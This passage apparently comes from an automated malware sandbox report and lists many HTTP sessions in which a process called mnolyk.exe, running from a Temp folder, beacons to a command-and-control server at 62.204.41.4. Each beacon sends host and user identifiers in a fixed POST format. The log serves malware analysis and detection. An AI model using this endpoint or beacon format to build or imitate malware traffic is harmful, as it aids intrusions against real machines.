                                                                    Feb 8, 2023 21:32:23.127954006 CET438INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    238192.168.2.34994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:23.296031952 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.359333038 CET439INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    239192.168.2.34994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:23.532205105 CET439OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.596193075 CET440INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    24192.168.2.34972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:22.634931087 CET225OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.698296070 CET225INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    240192.168.2.34994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:23.769179106 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.834645987 CET441INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    241192.168.2.34994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:24.007317066 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.071053982 CET442INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    242192.168.2.34994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:24.249933004 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.313520908 CET443INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    243192.168.2.34994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:24.485227108 CET443OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.553652048 CET444INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    244192.168.2.34994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:24.773081064 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:24.837829113 CET445INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    245192.168.2.34994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:25.015743017 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.080547094 CET446INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    246192.168.2.34994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:25.249769926 CET446OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.313677073 CET447INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    247192.168.2.34994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:25.497713089 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.561935902 CET448INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    248192.168.2.34995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:25.900036097 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:25.963053942 CET449INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    249192.168.2.34995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:26.219929934 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.287198067 CET450INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    25192.168.2.34972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:22.887482882 CET226OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.952716112 CET226INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    250192.168.2.34995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:26.521262884 CET450OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.584475040 CET451INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    251192.168.2.34995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:26.867865086 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:26.933233023 CET452INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    252192.168.2.34995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:27.113818884 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.177083015 CET453INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    253192.168.2.34995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:27.359899998 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.424393892 CET454INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    254192.168.2.34995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:27.633042097 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.698436975 CET455INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    255192.168.2.34995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:27.889281034 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
